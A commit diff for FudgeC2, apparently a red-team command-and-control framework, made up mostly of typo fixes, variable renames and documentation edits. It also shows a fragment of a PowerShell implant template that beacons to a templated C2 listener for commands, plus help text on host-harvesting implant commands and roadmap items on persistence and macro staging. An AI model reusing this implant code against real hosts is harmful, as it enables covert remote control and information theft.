Version 0.2 complete - Minor commit with spelling + typo changes

FudgeC2/Controller.py

@@ -41,5 +41,4 @@ def start_controller(listener_management):
 while 1:
     # Hold the application threads open
     time.sleep(15)
-    # LM.get_active_listeners()
     pass

FudgeC2/Implant/Implant.py

@@ -3,7 +3,7 @@
 
 class ImplantSingleton:
     class __OnlyOne:
-        # -- The Implant class is sole class responible for controlling data to and from implants.
+        # -- The Implant class is sole class responsible for controlling data to and from implants.
         # --    it manages  these interaction across all types of implants and communication protocols.
 
         def AddCommand(self, User, cid, UniqueImplantKey,Command):
@@ -39,12 +39,10 @@ def IssueCommand(self,UIK=0, c2_protocol=None):
 
         # -- Used by Implant - Logs command responses from infected machines.
         def CommandResponse(self,result, c2_protocol=None):
-            aa = result.split("::", 1) # Remove the identifying prefix
-            generated_implant_data = db.Get_GeneratedImplantDataFromUIK(aa[0])
-            db.Register_ImplantResponse(generated_implant_data[0]['cid'],aa[0],aa[1], c2_protocol)
-            # -- Legacy Format Below: To remove -- #
-            # self.CommandOutput.append(result)
-            return 0
+            uik_and_response_data = result.split("::", 1) # Remove the identifying prefix
+            generated_implant_data = db.Get_GeneratedImplantDataFromUIK(uik_and_response_data[0])
+            db.Register_ImplantResponse(generated_implant_data[0]['cid'],uik_and_response_data[0],uik_and_response_data[1], c2_protocol)
+
 
         # -- Used by webapp.
         def Get_CommandResult(self,cid):

FudgeC2/Implant/ImplantGeneratorDecorators.py

@@ -46,13 +46,12 @@ class ImplantGenerator():
         '''
     text = '''
     $sleep={{ beacon }}
-    $wc = New-Object System.Net.WebClient
+    # $wc = New-Object System.Net.WebClient
     while($true){
         start-sleep($sleep)
         $headers = @{}
         $headers.Add("X-Implant","{{ uii }}")
         try {
-            #$LoginResponse = $wc.
             $LoginResponse = Invoke-WebRequest '{{ http }}://{{url}}:{{port}}/index' -Headers $headers -Body $Body -Method 'POST'
         }
         catch {
@@ -93,7 +92,7 @@ def randomise_jinja_variables(self, JinjaRandomisedArgs):
         print("Randomising Jinja2 Variables")
         # TODO: Complete for level 0 obfuscation
         # -- Iterate over all variables contained within self.JinjaRandomisedArgs and replace the value
-        # --    ensure that all variable are unqiue.
+        # --    ensure that all variable values are unqiue.
         return JinjaRandomisedArgs
 
     # -- Public Functions

FudgeC2/ServerApp/modules/ImplantManagement.py

@@ -11,7 +11,6 @@ def _form_validated_obfucation_level_(self, form):
         for x in form:
             if "obfus" in x:
                 a  = x.split("-")
-                print("ll", a[1])
                 # -- returning first value, we should only receive a single entry.
                 try:
                     return int(a[1])
@@ -105,16 +104,15 @@ def CreateNewImplant(self,cid,form, user):
                 if "comms_binary" in form :
                     comms_binary = 1
                 if comms_binary == 0 and comms_dns == 0 and comms_http == 0 and comms_https == 0:
-                    raise ValueError('No communitcation channel selected. ')
+                    raise ValueError('No communication channel selected.')
                 if comms_http ==1 and comms_https == 1:
-                    raise ValueError("Please select either HTTP or HTTPS. Multiprotocol is not yet supported.")
+                    raise ValueError("Please select either HTTP or HTTPS. Multi-protocol is not yet supported.")
                 a = self.db.Add_Implant(cid, title ,url,port,beacon,initial_delay,comms_http,comms_https,comms_dns,comms_binary,description,obfuscation_level)
                 if a == True:
                     return True, "Implant created."
                 else:
-                    raise ValueError("Error creating entry. Ensure filename is unique")
+                    raise ValueError("Error creating entry. Ensure implant title is unique")
         except Exception as e:
-            print("NewImplant: ",e)
             # --  returning page with generic Error --#
             return False, e
 

FudgeC2/ServerApp/templates/BaseNavbar.html

@@ -34,7 +34,7 @@
   </div>
     <ul class="nav navbar-nav navbar-right">
       <li class="pr-3">
-        <a class="nav-link" href="{{ url_for('HelpPage') }}">Help <i class="fas fa-question-circle"></i></a>
+        <a class="nav-link" href="{{ url_for('HelpPage') }}">Documentation <i class="fas fa-question-circle"></i></a>
       </li>
     </ul>
     <ul class="nav navbar-nav navbar-right">

FudgeC2/ServerApp/templates/HelpPage.html

@@ -8,23 +8,24 @@
     </div>
     <div class="col-md-10 m-0 p-2">
         <div class="p-3 m-0 rounded iplm  ">
-            <h1>Help</h1>
-
-            <h2>Configuration</h2>
+            <h1>FudgeC2 Documentation</h1>
+            <p class="text-warning">This documentation contain incomplete information, as well as documentation on unimplemented features.</p>
+            <h3>Configuration</h3>
             <h4>User Account</h4>
             <h5>Add user</h5>
             <p>Adding a user account can be done by any admin in the global settings:
                 <a href="/settings">/settings</a>   </p>
 
             <h5>Configure campaign users</h5>
-            <p>http://fudge.moozle.wtf:5001/1/settings</p>
+            <p>This can be found within the campaign settings, under <code>/[campaign id]/settings</code> </p>
             <h5>Password Reset</h5>
-            <p>Global settings <b>IN DEVELOPMENT</b></p>
+            <p>Resetting a users password can be achieve in the global settings. This will generated a one-time password, which the user will change on first logon. (Not yet implemented)<br>
+                <a href="/settings">/settings</a>   </p>
 
             <br>
             <h4>Listeners</h4>
             <p>
-                Listeners are the device which catch communication from implants, and issue commands. Configuring listeners requires admin providlegs.</p>
+                Listeners are the device which catch communication from implants, and issue commands. Configuring listeners requires admin privileges.</p>
 
             <p class="text-danger">Caution: When stopping a listener it will impact all implants, not just those from your own campaign. Communicate to your wider teams.</p>
 
@@ -33,13 +34,16 @@ <h4>Listeners</h4>
             <p>Once a listener has been set up for a given protocol and port it does not need to be done against for a separate campaign. All campaign which used an identical implant configuration will use this listener.</p>
 
             <p>Common examples of shared listeners are HTTP on port 80, or HTTPS on port 443. Once a listener has been set up, all implant, for all campaign can use it (and once stopped, it will stop for all).</p>
+            <p>When creating listeners you have the option to auto-start a listener, this will enable the listener upon creation.</p>
+            <p>Listeners can be configured here:<br>
+            <a href="/listener">/listeners</a></p>
 
 
             <h2>Built in commands</h2>
             <p>Active implants have a number of builtin commands designed to perform common actions, and harvest host information.<br>
             below is the list of current implant commands:</p>
             <code>:: sys_info</code>
-            <p> Sys_info: Collects username and hostname</p>
+            <p> Sys_info: Collects username and hostname. (Not yet implemented)</p>
             <code>:: network_info</code>
             <p>Collects network information including domain, hostname, ip address, active network services.</p>
 

FudgeC2/ServerApp/templates/implant_input.html

@@ -93,7 +93,7 @@
                     // console.log(response[element]);
                     tmp_text = response[element].log_entry
                     response_data = tmp_text.replace(new RegExp('\r?\n','g'), '<br />');
-                    GG = "<div><p>IID: "+response[element].title+"<br>Time: "+d+"<br>Rsp: <code>"+response_data+"</code></p></div><hr>";
+                    GG = "<div><p>ID: "+response[element].title+"<br>Time: "+d+"<br>Resp: <code>"+response_data+"</code></p></div><hr>";
                     WP = document.getElementById('Response').innerHTML;
                     // alert(WP);
                     document.getElementById('Response').innerHTML = GG + WP;

FudgeC2/ServerApp/templates/listeners/listeners.html

@@ -21,7 +21,7 @@
         </div>
         {% endif %}
         <div><h1>Listeners</h1><p>Listeners can be configured from here, please consider other campaigns before any listeners is terminated.</p></div>
-        <div><p class="text-danger">Note: Customised Listeners are currently in development.</p></div>
+        <div><p class="text-danger">Dev note: Listener configuration is currently in development, users can only <b>start</b> listeners.</p></div>
         <h5>Configured Listeners:</h5>
 
         <p>

README.md

@@ -164,7 +164,7 @@ Release 0.2 _(Human Grunt)_
 
 ##### Implant
 
-- [ ] Add further work on implant obfuscation levels/configuration.
+
 - [x] Add implant special tags formatted: `::cmd::`
 - [x] Create further staging options (docm)
 - [x] Improve format of returning data.
@@ -176,7 +176,7 @@ Release 0.2 _(Human Grunt)_
 ##### Controller
 - [x] Check for `fudge.db` in the working dir, if not configure new setup. 
 - [x] Code refactor Controller to boot server & listener 
-- [ ] Clean code for version release
+- [x] Clean code for version release - partial
 
 
  ---
@@ -191,10 +191,10 @@ Release 0.2 _(Human Grunt)_
 ##### Implant
  - [ ] Add persistence mechanism
  - [ ] Add .docx macro
- - [ ] Improve obfuscation
+ - [ ] Add further work on implant obfuscation levels/configuration.
 
 ##### Controller
-- [ ] Restructure how listeners are configured and launched. This piece of work will be staged over serveral releases.
+- [ ] Restructure how listeners are configured and launched. This piece of work will be staged over several releases.
 
 ##### Campaign Viewer
 - [ ] Author separate viewer mechanisms for the client/blue team
@@ -208,6 +208,7 @@ Release 0.2 _(Human Grunt)_
  - [ ] Refactor Webapp flask into Flask Blueprints.
  - [ ] Add filter for implants on implant page to reduce noise.
 
+
 
 ##### Implant
  - [ ] Create DNS comms channel